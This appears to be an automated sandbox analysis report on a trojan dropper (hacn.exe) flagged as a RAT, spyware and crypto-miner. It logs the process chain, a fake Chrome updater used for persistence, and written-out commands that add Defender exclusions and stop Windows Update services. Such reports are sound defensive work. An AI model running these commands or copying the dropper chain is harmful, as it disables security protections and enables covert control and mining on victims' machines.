                                  Source: setup.exe, 00000006.00000002.1730634799.00007FF617A69000.00000004.00000001.01000000.0000000C.sdmp, setup.exe, 00000006.00000002.1729709589.000002A767720000.00000004.00000001.00020000.00000000.sdmp, setup.exe, 00000006.00000000.1678821594.00007FF617A69000.00000008.00000001.01000000.0000000C.sdmp, updater.exe, 00000019.00000002.1796934225.00007FF692C29000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: .SlnIX
                                  Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: .pptx.odt.csv.sql.mdb.sln.php
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@78/35@3/3
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D328570 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF61D328570
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A13226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,17_2_00007FF65A13226C
                                  Source: C:\Windows\System32\dialer.exeCode function: 45_2_00007FF7C6D6226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,45_2_00007FF7C6D6226C
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A1319C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,17_2_00007FF65A1319C4
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,4_2_000FA6C2
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLogJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                                  Source: C:\ProgramData\main.exeMutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7948:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3104:120:WilError_03
                                  Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\vwsnnrazkcwzikmi
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722Jump to behavior
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCommand line argument: sfxname4_2_000FDF1E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCommand line argument: sfxstime4_2_000FDF1E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCommand line argument: STARTDLG4_2_000FDF1E
                                  Source: hacn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7748
                                  Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                  Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: hacn.exeReversingLabs: Detection: 47%
                                  Source: C:\Users\user\Desktop\hacn.exeFile read: C:\Users\user\Desktop\hacn.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exeJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.batJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
                                  Source: C:\Users\user\Desktop\hacn.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: hacn.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                  Source: hacn.exeStatic file information: File size 12925322 > 1048576
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: hacn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: hacn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: s.exe, 00000004.00000000.1661323675.0000000000113000.00000002.00000001.01000000.00000006.sdmp, s.exe, 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
                                  Source: Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: hacn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: hacn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: hacn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: hacn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: hacn.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: main.exe.4.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Source: Update.exe.5.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: main.exe.4.drStatic PE information: 0xEE92FC16 [Thu Nov 1 12:09:58 2096 UTC]
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile created: C:\ProgramData\__tmp_rar_sfx_access_check_5774593Jump to behavior
                                  Source: main.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x59e690
                                  Source: wxyubnjmnlae.tmp.25.drStatic PE information: real checksum: 0x0 should be: 0x520b71
                                  Source: s.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x7459da
                                  Source: Update.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x59e690
                                  Source: updater.exe.6.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: setup.exe.4.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: wxyubnjmnlae.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x316d6
                                  Source: hacn.exeStatic PE information: section name: _RDATA
                                  Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.0.drStatic PE information: section name: PyRuntim
                                  Source: s.exe.0.drStatic PE information: section name: .didat
                                  Source: setup.exe.4.drStatic PE information: section name: .xdata
                                  Source: updater.exe.6.drStatic PE information: section name: .xdata
                                  Source: wxyubnjmnlae.tmp.25.drStatic PE information: section name: _RANDOMX
                                  Source: wxyubnjmnlae.tmp.25.drStatic PE information: section name: _TEXT_CN
